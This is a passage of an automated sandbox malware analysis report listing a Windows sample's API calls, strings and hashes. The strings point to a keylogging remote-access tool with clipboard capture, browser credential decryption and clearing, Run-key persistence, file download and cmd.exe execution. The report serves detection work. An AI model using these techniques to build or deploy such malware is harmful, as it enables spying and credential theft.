                                      • CreateThread.KERNEL32(00000000,00000000,0040A295,?,00000000,00000000), ref: 0040AF86
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CreateThread$LocalTime$wsprintf
                                      • String ID: Online Keylogger Started
                                      • API String ID: 112202259-1258561607
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: | $%02i:%02i:%02i:%03i $PkGNG
                                      • API String ID: 481472006-3277280411
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLocalTime.KERNEL32(?), ref: 00404F81
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404FCD
                                      • CreateThread.KERNEL32(00000000,00000000,00405150,?,00000000,00000000), ref: 00404FE0
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 00404F94
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$EventLocalThreadTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 2532271599-1507639952
                                      • Opcode ID: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                      • Instruction ID: 982fc92e7e47f2769c776e0d9ab1702947c5453eb715a4cfed9cf45540ca89dc
                                      • Opcode Fuzzy Hash: 7c8a9ce4b383af45d5410d66a549d3ab3812e2de270479e75a3fa2d1d41e82a0
                                      • Instruction Fuzzy Hash: A8110671904385AAC720A7778C0DEAB7FA8DBD2710F04046FF54163291DAB89445CBBA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData), ref: 00406A82
                                      • GetProcAddress.KERNEL32(00000000), ref: 00406A89
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: CryptUnprotectData$crypt32
                                      • API String ID: 2574300362-2380590389
                                      • Opcode ID: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                      • Instruction ID: d796ed41fc96dc9ef8d801536240fab0e9422483ab40f89d2a564a4d0f07de08
                                      • Opcode Fuzzy Hash: 58a6a211d8528d7034b6d4e537693813dfb36b0b7d2b88ce6c125ece2ab5d6dc
                                      • Instruction Fuzzy Hash: 6201B535B00216ABCB18DFAD9D449ABBBB8EB49300F14817EE95AE3341D674D9008BA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,10558B1C,10558B1C,PkGNG,0044C302,FF8BC369,00000000,00000002,00000000,PkGNG), ref: 0044C28C
                                      • GetLastError.KERNEL32 ref: 0044C296
                                      • __dosmaperr.LIBCMT ref: 0044C29D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorFileLastPointer__dosmaperr
                                      • String ID: PkGNG
                                      • API String ID: 2336955059-263838557
                                      • Opcode ID: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                      • Instruction ID: 03228b3a5a263cac3d3762c0c6cb9bea0ee6cefe7ee70a3785aa569069518732
                                      • Opcode Fuzzy Hash: 60eaf30ffa5a6b77e16cdf42a69bcf8f7fa5cf007f91ab5b57ca5c6e56bd7837
                                      • Instruction Fuzzy Hash: 9E016D32A11104BBDF008FE9CC4089E3719FB86320B28039AF810A7290EAB5DC118B64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405159), ref: 00405173
                                      • CloseHandle.KERNEL32(?), ref: 004051CA
                                      • SetEvent.KERNEL32(?), ref: 004051D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseEventHandleObjectSingleWait
                                      • String ID: Connection Timeout
                                      • API String ID: 2055531096-499159329
                                      • Opcode ID: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                      • Instruction ID: e4880b57ed2806ada623013920947221b56867654f576af2420d72dde76e11cf
                                      • Opcode Fuzzy Hash: 16c0c5432ea764d1c3b3677813c316a5f50629e206d56325c82df1a06a1f960a
                                      • Instruction Fuzzy Hash: 1201D831A40F40AFE7257B368D9552BBBE0FF01302704097FE68396AE2D6789800CF59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E833
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Exception@8Throw
                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                      • API String ID: 2005118841-1866435925
                                      • Opcode ID: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                      • Instruction ID: aca7d9cae529c24a85643cb8f0975e7fdd15ab88b82278639a3f13e82648cb6f
                                      • Opcode Fuzzy Hash: 8dcc56bc0b3abd67e197b42ddab56c72444c781ea05e0f6efff8352e2a22a648
                                      • Instruction Fuzzy Hash: 2C01B1315443086AE618F693C843FAA73585B10708F108C2FAA15761C2F67D6961C66B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,00474EF8,00474EF8,PkGNG,00404A40), ref: 0041CB09
                                      • LocalFree.KERNEL32(?,?), ref: 0041CB2F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FormatFreeLocalMessage
                                      • String ID: @J@$PkGNG
                                      • API String ID: 1427518018-1416487119
                                      • Opcode ID: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                      • Instruction ID: 02a9d8e2c753fe243ccbc909122ce1ddd8f8b45a09ed5088e6b723b988b0f700
                                      • Opcode Fuzzy Hash: 582a0a935ffae84e33b405a2c8e80a835bcb557197e1ba62297b84e69e8a9d31
                                      • Instruction Fuzzy Hash: 5EF0A434B0021AAADF08A7A6DD4ADFF7769DB84305B10007FB606B21D1EEB86D05D659
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegCreateKeyW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,?), ref: 0041381F
                                      • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,?,00000000,004752D8,76F937E0,?), ref: 0041384D
                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,004752D8,76F937E0,?,?,?,?,?,0040CFAA,?,00000000), ref: 00413858
                                      Strings
                                      • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 0041381D
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                      • API String ID: 1818849710-1051519024
                                      • Opcode ID: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                      • Instruction ID: 91b44a8789fefabe47d0aed0b401f4e945a8dec35bb1902c17c37083bf943f80
                                      • Opcode Fuzzy Hash: 3da2de30dd2e4c2ff773a1c969aacac889c14d245fa7b83563a43fe4ea506f1b
                                      • Instruction Fuzzy Hash: 83F0C271440218FBDF10AFA1EC45FEE376CEF00B56F10452AF905A61A1E7359F04DA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 0040DFB1
                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040DFF0
                                        • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 0043565F
                                        • Part of subcall function 00435640: _Yarn.LIBCPMT ref: 00435683
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0040E016
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                      • String ID: bad locale name
                                      • API String ID: 3628047217-1405518554
                                      • Opcode ID: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                      • Instruction ID: c9d4814c50014869750c7e26a4e1a69426a580a77e14145940ab7c7d7e24a8db
                                      • Opcode Fuzzy Hash: 03a3a1b6538e95a80bbc96a5a3230d3fb174e533ca0510e3d942a7448ac3be7a
                                      • Instruction Fuzzy Hash: EAF081314006049AC634FA62D863B9AB7B89F14718F504A7FB906228D1EF7CBA1CCA4C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegCreateKeyA.ADVAPI32(80000001,Control Panel\Desktop,0046611C), ref: 0041377E
                                      • RegSetValueExA.ADVAPI32(0046611C,?,00000000,?,00000000,00000000,Control Panel\Desktop,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000), ref: 004137A6
                                      • RegCloseKey.ADVAPI32(0046611C,?,?,0041CAB1,WallpaperStyle,0046611C,00000001,00474EE0,00000000,?,0040875D,00000001), ref: 004137B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCreateValue
                                      • String ID: Control Panel\Desktop
                                      • API String ID: 1818849710-27424756
                                      • Opcode ID: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                      • Instruction ID: c04290829ccef693e4e8b5b7d06cdf9a2950efbbd707a4c1379ff92f90edcb59
                                      • Opcode Fuzzy Hash: 6030d9855dac89f4cd46f7f8c789974497344dcf9873e73d86c3d4cdefa30cde
                                      • Instruction Fuzzy Hash: B8F06272400118FBCB009FA1DD45DEA376CEF04B51F108566FD09A61A1D7359E14DB54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateThread.KERNEL32(00000000,00000000,Function_0001D45D,00000000,00000000,00000000), ref: 00416C47
                                      • ShowWindow.USER32(00000009), ref: 00416C61
                                      • SetForegroundWindow.USER32 ref: 00416C6D
                                        • Part of subcall function 0041CD9B: AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                        • Part of subcall function 0041CD9B: ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                        • Part of subcall function 0041CD9B: SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$ConsoleShow$AllocCreateForegroundOutputThread
                                      • String ID: !D@
                                      • API String ID: 3446828153-604454484
                                      • Opcode ID: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                      • Instruction ID: c1d0571eb829819ca76672189d51ce116019f2d3a91c4b5ec781e9fa27a10d2f
                                      • Opcode Fuzzy Hash: 6979cefb1d1fefa54efaa96eb459276fcc124e6eae3c34ad0f1a5970b9474eaa
                                      • Instruction Fuzzy Hash: 9EF05E70158201EAD720AB62EC45AFA7B69EB54351F00483BF849D14F2DB398C85C69D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 00416130
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ExecuteShell
                                      • String ID: /C $cmd.exe$open
                                      • API String ID: 587946157-3896048727
                                      • Opcode ID: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                      • Instruction ID: 0a18f3537a1213b4b5dca9b82f73c842755a7e35c30cee8a650de64661b344da
                                      • Opcode Fuzzy Hash: 1fb54d341f42364606467e993f20cb3c4ceaa424224daa94047b07daa39982c0
                                      • Instruction Fuzzy Hash: 0DE0C0B0208345AAC705E775CC95CBF73ADAA94749B50483F7142A20E2EF7C9D49C659
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 00401414
                                      • GetProcAddress.KERNEL32(00000000), ref: 0040141B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressHandleModuleProc
                                      • String ID: GetCursorInfo$User32.dll
                                      • API String ID: 1646373207-2714051624
                                      • Opcode ID: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                      • Instruction ID: 65f79b4a2c2aed896b4012a4b0ac893fb7d0ccba54e760513c8834f3bef68171
                                      • Opcode Fuzzy Hash: 0feee19109755bbb7e48939f97e78712d63acfb534ae43d0cb60b2001d0c131e
                                      • Instruction Fuzzy Hash: B4B09B70541740E7CB106BF45C4F9153555B514703B105476B44996151D7B44400C61E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 004014B9
                                      • GetProcAddress.KERNEL32(00000000), ref: 004014C0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressLibraryLoadProc
                                      • String ID: GetLastInputInfo$User32.dll
                                      • API String ID: 2574300362-1519888992
                                      • Opcode ID: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                      • Instruction ID: ea73ef4d1088e939c140d9431744cb36a9dcab52d5ea7f3e4bb33043e5d41cbe
                                      • Opcode Fuzzy Hash: 6185ad33e38da01c5cedd7fab51ef37947c258832bc82ab0b36b916a7b459740
                                      • Instruction Fuzzy Hash: 5EB092B45C1700FBCB106FA4AC4E9293AA9A614703B1088ABB845D2162EBB884008F9F
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Strings
                                      • Cleared browsers logins and cookies., xrefs: 0040C0F5
                                      • [Cleared browsers logins and cookies.], xrefs: 0040C0E4
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Sleep
                                      • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                      • API String ID: 3472027048-1236744412
                                      • Opcode ID: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                      • Instruction ID: fac43f66edf0589ccdcbb227709f1a337e776f7542e83b73a027453bfa593f46
                                      • Opcode Fuzzy Hash: 24f20f3b92deb628025467620478f708c177420abe32db4e4f6f8a7850cc6954
                                      • Instruction Fuzzy Hash: 2531C804348380E9D6116BF554567AB7B814E93744F08457FB9C42B3D3D97E4848C7AF
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 0041C551: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041C561
                                        • Part of subcall function 0041C551: GetWindowTextLengthW.USER32(00000000), ref: 0041C56A
                                        • Part of subcall function 0041C551: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041C594
                                      • Sleep.KERNEL32(000001F4), ref: 0040A573
                                      • Sleep.KERNEL32(00000064), ref: 0040A5FD
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Window$SleepText$ForegroundLength
                                      • String ID: [ $ ]
                                      • API String ID: 3309952895-93608704
                                      • Opcode ID: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                      • Instruction ID: 97bd403738d1ca0cb59e80c1fc79ee6201ed0cb329172f4776a94889a39aca56
                                      • Opcode Fuzzy Hash: 4603c95d7a0278816d05f17b1e103e1b56ebf32c1baad14edcc254fcbbfd146b
                                      • Instruction Fuzzy Hash: FE119F315043006BC614BB65CC5399F77A8AF50308F40053FF552665E2FF79AA5886DB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                      • Instruction ID: 17f232e73e96fb976a24982deb7d35e81c220cd9520ca4ef7e8dcf180de91df6
                                      • Opcode Fuzzy Hash: 26aae147e3b4032e8d822610677c8b44980169b964e3a1f9465f38b9cd56633c
                                      • Instruction Fuzzy Hash: 1301F2B36497067EFA202E786CC1F67220CDF41BBEB34032BB574712D1DA68CE404568
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                      • Instruction ID: 34d970f17befced98e3ca294e9c9a609e5e7bfbb0444a55afbb34e25ce639c56
                                      • Opcode Fuzzy Hash: 544fafb264448ea5c1072d449201ab24ccf485d51590c339dd7f80fdded84d3d
                                      • Instruction Fuzzy Hash: 0601A2B26096117EFA111E796CC4E27624CDB81BBF325032BF535612D6DA688E014169
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                      • GetFileSize.KERNEL32(00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4B2
                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C4D7
                                      • CloseHandle.KERNEL32(00000000,?,00000000,0040412F,00465E74), ref: 0041C4E5
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 3919263394-0
                                      • Opcode ID: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                      • Instruction ID: d938e931a51b81dfe9e25773ede9364464a286a3a3b97e7b856b7b87d8bf29b3
                                      • Opcode Fuzzy Hash: c4d28c244904a0c4b31f6914b30dbe9704a3e03414ae878e480ac2c22075bc56
                                      • Instruction Fuzzy Hash: 0FF0C2B1245308BFE6101B25ACD4EBB375CEB867A9F00053EF902A22C1CA298C05913A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                                      • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C233
                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041C23B
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleOpenProcess
                                      • String ID:
                                      • API String ID: 39102293-0
                                      • Opcode ID: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                      • Instruction ID: 502f13a9e38f74389cb09c542eced9ec4ef47df168bad581006c654e14f0d55b
                                      • Opcode Fuzzy Hash: f9441541d1e055ebec971b28555d0febc4d5c2f8e157a993c91f5ce795852cd2
                                      • Instruction Fuzzy Hash: 53012BB1680315ABD61057D49C89FB7B27CDB84796F0000A7FA04D21D2EF748C818679
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 0043987A
                                        • Part of subcall function 00439EB2: ___AdjustPointer.LIBCMT ref: 00439EFC
                                      • _UnwindNestedFrames.LIBCMT ref: 00439891
                                      • ___FrameUnwindToState.LIBVCRUNTIME ref: 004398A3
                                      • CallCatchBlock.LIBVCRUNTIME ref: 004398C7
                                      Similarity
                                      • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                      • String ID:
                                      • API String ID: 2633735394-0

                                      APIs
                                      • GetSystemMetrics.USER32(0000004C), ref: 004193F0
                                      • GetSystemMetrics.USER32(0000004D), ref: 004193F6
                                      • GetSystemMetrics.USER32(0000004E), ref: 004193FC
                                      • GetSystemMetrics.USER32(0000004F), ref: 00419402
                                      Similarity
                                      • API ID: MetricsSystem
                                      • String ID:
                                      • API String ID: 4116985748-0

                                      APIs
                                      • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00438F31
                                      • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00438F36
                                      • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00438F3B
                                        • Part of subcall function 0043A43A: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 0043A44B
                                      • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00438F50
                                      Similarity
                                      • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                      • String ID:
                                      • API String ID: 1761009282-0

                                      APIs
                                      • __startOneArgErrorHandling.LIBCMT ref: 00442CED
                                      Similarity
                                      • API ID: ErrorHandling__start
                                      • String ID: pow
                                      • API String ID: 3213639722-2276729525

                                      APIs
                                      • WideCharToMultiByte.KERNEL32(000000FF,00000000,00000006,00000001,?,?,00000000,?,00000000,?,?,00000000,00000006,?,?,?), ref: 00449F0F
                                      • GetLastError.KERNEL32 ref: 00449F2B
                                      Similarity
                                      • API ID: ByteCharErrorLastMultiWide
                                      • String ID: PkGNG
                                      • API String ID: 203985260-263838557

                                      APIs
                                        • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                      • __Init_thread_footer.LIBCMT ref: 0040B797
                                      Similarity
                                      • API ID: Init_thread_footer__onexit
                                      • String ID: [End of clipboard]$[Text copied to clipboard]
                                      • API String ID: 1881088180-3686566968

                                      APIs
                                      • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,00451D92,?,00000050,?,?,?,?,?), ref: 00451C12
                                      Similarity
                                      • API ID:
                                      • String ID: ACP$OCP
                                      • API String ID: 0-711371036

                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB6E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B7DB
                                      • GetLastError.KERNEL32 ref: 0044B804
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: PkGNG
                                      • API String ID: 442123175-263838557

                                      APIs
                                      • WriteFile.KERNEL32(?,?,?,?,00000000,FF8BC35D,00000000,?,PkGNG,0044BB8E,?,00000000,FF8BC35D,00000000,00000000,FF8BC369), ref: 0044B6ED
                                      • GetLastError.KERNEL32 ref: 0044B716
                                      Similarity
                                      • API ID: ErrorFileLastWrite
                                      • String ID: PkGNG
                                      • API String ID: 442123175-263838557

                                      APIs
                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405030
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • GetLocalTime.KERNEL32(?,00475598,?,00000000,?,?,?,?,?,?,00415CC9,?,00000001,0000004C,00000000), ref: 00405087
                                      Strings
                                      • KeepAlive | Enabled | Timeout: , xrefs: 0040501F
                                      Similarity
                                      • API ID: LocalTime
                                      • String ID: KeepAlive | Enabled | Timeout:
                                      • API String ID: 481472006-1507639952

                                      APIs
                                      • Sleep.KERNEL32 ref: 00416640
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000002,00000000,00000000), ref: 004166A2
                                      Similarity
                                      • API ID: DownloadFileSleep
                                      • String ID: !D@
                                      • API String ID: 1931167962-604454484

                                      APIs
                                      • PathFileExistsW.SHLWAPI(00000000), ref: 0041AD3C
                                      Similarity
                                      • API ID: ExistsFilePath
                                      • String ID: alarm.wav$hYG
                                      • API String ID: 1174141254-2782910960

                                      APIs
                                        • Part of subcall function 0040B164: GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                        • Part of subcall function 0040B164: wsprintfW.USER32 ref: 0040B1F3
                                        • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                      • CloseHandle.KERNEL32(?), ref: 0040B0B4
                                      • UnhookWindowsHookEx.USER32 ref: 0040B0C7
                                      Similarity
                                      • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                      • String ID: Online Keylogger Stopped
